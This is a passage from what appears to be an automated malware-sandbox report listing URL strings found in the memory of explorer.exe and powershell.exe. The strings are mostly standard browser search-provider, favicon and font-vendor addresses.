Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://sads.myspace.com/
Source: powershell.exe, 0000001B.00000002.929901924.000001A03E371000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search-dyn.tiscali.it/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.about.com/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.alice.it/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.alice.it/favicon.ico
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.aol.co.uk/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.aol.com/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.aol.in/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.atlas.cz/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.auction.co.kr/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.auone.jp/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.books.com.tw/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.books.com.tw/favicon.ico
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.centrum.cz/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.centrum.cz/favicon.ico
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.chol.com/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.chol.com/favicon.ico
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.cn.yahoo.com/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.daum.net/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.daum.net/favicon.ico
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.dreamwiz.com/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.dreamwiz.com/favicon.ico
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.co.uk/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.com/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.com/favicon.ico
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.de/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.es/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.fr/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.in/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.it/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.empas.com/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.empas.com/favicon.ico
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.espn.go.com/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.gamer.com.tw/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.gamer.com.tw/favicon.ico
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.gismeteo.ru/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.goo.ne.jp/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.goo.ne.jp/favicon.ico
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.hanafos.com/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.hanafos.com/favicon.ico
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.interpark.com/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ipop.co.kr/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ipop.co.kr/favicon.ico
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&q=
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&q=
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&q=
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?q=
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.livedoor.com/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.livedoor.com/favicon.ico
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.lycos.co.uk/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.lycos.com/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.lycos.com/favicon.ico
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.co.jp/results.aspx?q=
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.co.uk/results.aspx?q=
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.com.cn/results.aspx?q=
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.com/results.aspx?q=
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.nate.com/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.naver.com/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.naver.com/favicon.ico
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.nifty.com/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.orange.co.uk/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.orange.co.uk/favicon.ico
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.rediff.com/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.rediff.com/favicon.ico
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.seznam.cz/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.seznam.cz/favicon.ico
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.sify.com/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.co.jp
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.co.jp/favicon.ico
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.com/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.com/favicon.ico
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&p=
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.yam.com/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search1.taobao.com/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search2.estadao.com.br/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://searchresults.news.com.au/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://service2.bfast.com/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://sitesearch.timesonline.co.uk/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://so-net.search.goo.ne.jp/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://suche.aol.de/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://suche.freenet.de/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://suche.freenet.de/favicon.ico
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://suche.lycos.de/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://suche.t-online.de/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://suche.web.de/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://suche.web.de/favicon.ico
Source: explorer.exe, 00000022.00000000.913944852.000000000D9E0000.00000002.00000001.sdmp	String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://tw.search.yahoo.com/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://udn.com/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://udn.com/favicon.ico
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://uk.ask.com/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://uk.ask.com/favicon.ico
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://uk.search.yahoo.com/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://vachercher.lycos.fr/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://video.globo.com/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://video.globo.com/favicon.ico
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://web.ask.com/
Source: explorer.exe, 00000022.00000000.913944852.000000000D9E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.com
Source: explorer.exe, 00000022.00000002.1094348803.0000000002B50000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.abril.com.br/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.abril.com.br/favicon.ico
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.alarabiya.net/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.alarabiya.net/favicon.ico
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.co.jp/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.co.uk/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&keyword=
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.com/favicon.ico
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&tag=ie8search-20&index=blended&linkCode=qs&c
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.de/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.aol.com/favicon.ico
Source: explorer.exe, 00000022.00000000.909102701.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 0000001B.00000002.930160141.000001A03E57D000.00000004.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.arrakis.com/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.arrakis.com/favicon.ico
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.asharqalawsat.com/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.asharqalawsat.com/favicon.ico
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ask.com/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.auction.co.kr/auction.ico
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.baidu.com/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.baidu.com/favicon.ico
Source: explorer.exe, 00000022.00000000.909102701.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.cdiscount.com/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.cdiscount.com/favicon.ico
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ceneo.pl/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ceneo.pl/favicon.ico
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.cjmall.com/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.cjmall.com/favicon.ico
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.clarin.com/favicon.ico
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.cnet.co.uk/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.cnet.com/favicon.ico
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.dailymail.co.uk/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.dailymail.co.uk/favicon.ico
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.docUrl.com/bar.htm
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.etmall.com.tw/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.etmall.com.tw/favicon.ico
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.excite.co.jp/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.expedia.com/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.expedia.com/favicon.ico
Source: explorer.exe, 00000022.00000000.909102701.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000022.00000000.909102701.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000022.00000000.909102701.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000022.00000000.909102701.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000022.00000000.909102701.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: explorer.exe, 00000022.00000000.909102701.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000022.00000000.909102701.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000022.00000000.909102701.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000022.00000000.909102701.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000022.00000000.909102701.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000022.00000000.909102701.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000022.00000000.909102701.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000022.00000000.909102701.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000022.00000000.909102701.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.gismeteo.ru/favicon.ico
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.gmarket.co.kr/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.gmarket.co.kr/favicon.ico
Source: explorer.exe, 00000022.00000000.909102701.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.co.in/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.co.jp/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.co.uk/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com.br/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com.sa/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com.tw/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com/favicon.ico
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.cz/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.de/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.es/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.fr/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.it/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.pl/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.ru/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.si/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.iask.com/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.iask.com/favicon.ico
Source: explorer.exe, 00000022.00000000.909102701.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.kkbox.com.tw/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.kkbox.com.tw/favicon.ico
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.linternaute.com/favicon.ico
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.maktoob.com/favicon.ico
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolibre.com.mx/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolivre.com.br/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.merlin.com.pl/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.merlin.com.pl/favicon.ico
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&a=
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.mtv.com/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.mtv.com/favicon.ico
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.myspace.com/favicon.ico
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.najdi.si/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.najdi.si/favicon.ico
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.nate.com/favicon.ico
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.neckermann.de/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.neckermann.de/favicon.ico
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.news.com.au/favicon.ico
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.nifty.com/favicon.ico
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ocn.ne.jp/favicon.ico
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.orange.fr/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.otto.de/favicon.ico
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ozon.ru/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ozon.ru/favicon.ico
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ozu.es/favicon.ico
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.paginasamarillas.es/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.paginasamarillas.es/favicon.ico
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.pchome.com.tw/favicon.ico
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.priceminister.com/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.priceminister.com/favicon.ico
